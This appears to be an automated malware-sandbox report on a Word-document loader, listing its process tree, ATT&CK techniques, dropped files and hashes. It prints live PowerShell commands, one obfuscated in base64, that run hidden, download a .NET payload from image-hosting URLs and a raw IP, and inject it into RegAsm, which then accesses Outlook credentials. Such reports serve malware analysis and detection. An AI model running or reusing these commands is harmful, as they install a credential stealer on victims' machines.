- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBEDgTreEUDgTreVwDgTrevDgTreDDgTreDgTreOQDgTrewDgTreDIDgTreLwDgTreyDgTreDIDgTreLgDgTre0DgTreDcDgTreMQDgTreuDgTreDMDgTreMwDgTrexDgTreC4DgTreNQDgTre0DgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreEMDgTreSDgTreBODgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.DEW/0902/22.471.331.54//:ptth' , '1' , 'C:\ProgramData\' , 'CCHN','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\CCHN.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2640

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ecqnu"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2928

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\oevfvmhiw"
6⤵
- Accesses Microsoft Outlook accounts
PID:2992

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zziqvfrksvfo"
6⤵
PID:2972

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zziqvfrksvfo"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
8a19e2f05bb9c727f7fb24ef7e6541e7

SHA1
fc4e212ec0c090fffc2c1b9c70fe5cb6c77592db

SHA256
7eb17f03f49ad906d62f715fe4e81e9341f8e7e900e429bc83d0787340dfa42f

SHA512
82b40631302b2338d74c48aaf0b848435020936eb99a1945a6a5397e123a6107eb5681d458595af641d4078383de41370afc882d94aec89e4c65f51e86c4c0d4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
a8267072869e89455f8d35d1ed961eb3

SHA1
403acb6effb7530e05a8359c3cd383e2bbce4ef5

SHA256
72fd2503c34ac6e694a3c595b0d1c888b7f9d717f0c7f10c468b35a78c2d724e

SHA512
08d414dda227f688b6e11772f086104eb1352e7f9f2c3427a34f32e41fe5d679454b26a2e6741a5a1c7ff948af398c43c28435448225934b47f77442692d27ae

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
13f0ca50147dfe66299dcc7ce3840fd5

SHA1
8fff29d5b28f0a3f1b8bd13572c3fc07f160704a

SHA256
568e537f90c6238a31a6297fa15df91a9d09019b982834501dff04df652074d1

SHA512
e2d2d9fd52e13c4f706904e0ca508d2bd6607558a109414926e6cc8c6eb1013724f364b700f6eda33e2a4d724f43ae7bf320a3b9b163f84cc82982783dc641f8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
63ee150149c8227d34cbce52dbb982e4

SHA1
95860b44ccc9bfd5a100e6fa4b54ef3be37779d8

SHA256
ad35021ca0c7886af1b08fbd77c3530e8b532c1cf8b0da5bfe874c8795927d19

SHA512
56bb0ef53f93946a1406d0a145cf22bff9371180d3197433a0947c2bda42c14e1f740b2d829b8a6f280e849ab1e60e45b406e53a9585bc46df10029d5ec6a582

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
8db96d82dbddcf89ab743845eba06654

SHA1
491976bc4f00b34f1052af2a44f8fc50f81b3d15

SHA256
33b5307d2c8ec217643c2969984c5c04853e3476c8d393aabcd20ab8191756f1

SHA512
579d31bdb69b8f031e18063e79958968948f600542854ef55816dac672f258b66e78b39cb1b15209fe4e12d03c3159bd00a9477387e1140c67d0ae2845903684

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{201E1898-B8D0-4BE0-81F0-DA1452DDD407}.FSD
Filesize
128KB

MD5
d888dbfcb4104223590b8db8f5c69f9a

SHA1
443ed508b624075bc3d0316212a804070c2cf1cb

SHA256
ddca150cc9c316930e05da29f6c75c5b53b48923ff9aa7005aed6617c07c9ad0

SHA512
9e6c5ca9ad2101891c279beae8502aebd3278dd560bfc2c7496d3b3ad614289a553083c6ad60852868240e2f506631e88bc0ea73d2ebf3ae5cc0dbf8e8c64c7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
7010aa937fea8597b7e7747e592ef033

SHA1
32798fb98f50f8f36289702b3139484b841961a9

SHA256
b5f2f471b87b0e04f7d396af198992b327926bff72af95dfef3accaaaee8e276

SHA512
980cc18973414fd0332319d99d57615f7615f6004cd740bfb56c7c877d056d80c2721a8d63736fc0a8a1b218b8a06efdb7862f8b6bef64714c20175d70f6a51e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{58D6EA87-2DB2-4BBF-BC11-73ECE3E3E676}.FSD
Filesize
128KB

MD5
f02d92da85e85a731d30389ece684004

SHA1
336d9574055fdffa99bcee0408d3ba3c69e2e143

SHA256
b28e74435a4740b7fcf2410ef1108efa1418b2f601b25fa6f1a6d1cb840d81d8

SHA512
25c7d47012c2371e6828056e0c802a59e893083d27709f51504c22087c1f8df2562285d5f3f68a998ecebe6c3a45fcb4af155fd64db2d9bd9ed5f958182f5c68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\iamwithyoubecauseiloveyoualotwhichneverbeenforesxyoumysweetheartialwaysloveryoutrulybeaucse___ineverwanttokissyou[1].doc
Filesize
73KB

MD5
96bd8f3d1b8badd184f3b8de29a26ab5

SHA1
5bbf4c72f5d2adc0348ac73cc1f70608dd1d554b

SHA256
74b7cbd3c66d01a6e25ccbe17375138c6a32699c61bf170e18ffecd6ebd55237

SHA512
dd8d1208f1954b24f5d2becfafa0ae27824a449486e946e6500a04c23c671a2ebb633b4c6808881003164aec027bd40801093d2b82e8e70f82408be5a2929847

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab39A7.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3E68.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4BC9.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ecqnu
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{5A8CC9BA-41AC-4B3C-8B3A-47EC60F958A9}
Filesize
128KB

MD5
d516c4b0c0cf858aa8f2c0c67b135146

SHA1
cdaa105cbd8aa9868111326d59c5accf65ba1ec3

SHA256
e44c904dd70a4ba830371774bcf5154a3e761e7e4c403f8fa52fc8b224f0cb20

SHA512
b7a8b33c92917955f286734054ffce05a4698987c7ab2fa750d3f811322c3c2643bf7ac1a1bfc1bc52ea8b865faa5d7fddb3db83cae4522c2bdc9a4e2937c9fc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\UHCXX6BE.txt
Filesize
829B

MD5
4e5494f2550c65c87eb8ae0b5330f68a

SHA1
e10adda56ec4c1f318815c6c7c6b9224ea825522

SHA256
c4987bfc5354556b20c7e308efa97dce5480747a7cce56599434a3e6f4fed9d9

SHA512
05c4bf60541eb7dd977667c1ede7da4c51c6c478e246aae348f6b9a5980f23863bff66b7df009e31507c7d16d33e8cf0ce104022ae1740a0358baa9083f2d2fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
a12b5c7456e19d78f39abea76c36dfca

SHA1
9db17d0cbc36682a1f87397352c628a8fe4f5aa0

SHA256
9c4ad432773bc19e4640dfdb2186a0b3cdb4f046f69e87e84680e620771bf483

SHA512
e26a15cac807ec79eda2fce6b5b889e46e7b2354ab49f62db1d8aa665a08af7d47c1b0564356ca83c0b698c73f092563d35a2e07c8d8bece49240609dea05c07

Download Submit
C:\Users\Admin\AppData\Roaming\imageiloveyoutruly.vbs
Filesize
107KB

MD5
be088dcf272ad90a3cd9c85d43afef55

SHA1
12905e15a9b5ffcf9df2f939e079ff5fcb200505

SHA256
299625a0b7be22692164da681b779e9ec5c9235885e312b18ed326b03ca53b81

SHA512
11765e579befb42f77b9486709c14e9f88971feb5b24dd9623b93c46fb728d0d090c3e56e08dc19789295a0d6413f9385d162f800aeb4c5c43adb90abb8cb811

Download Submit
memory/688-252-0x0000000069F50000-0x000000006A4FB000-memory.dmp

Filesize
5.7MB

Download
memory/688-147-0x0000000069F50000-0x000000006A4FB000-memory.dmp

Filesize
5.7MB

Download
memory/688-148-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Filesize
256KB

Download
memory/688-149-0x0000000069F50000-0x000000006A4FB000-memory.dmp

Filesize
5.7MB

Download
memory/688-150-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Filesize
256KB

Download
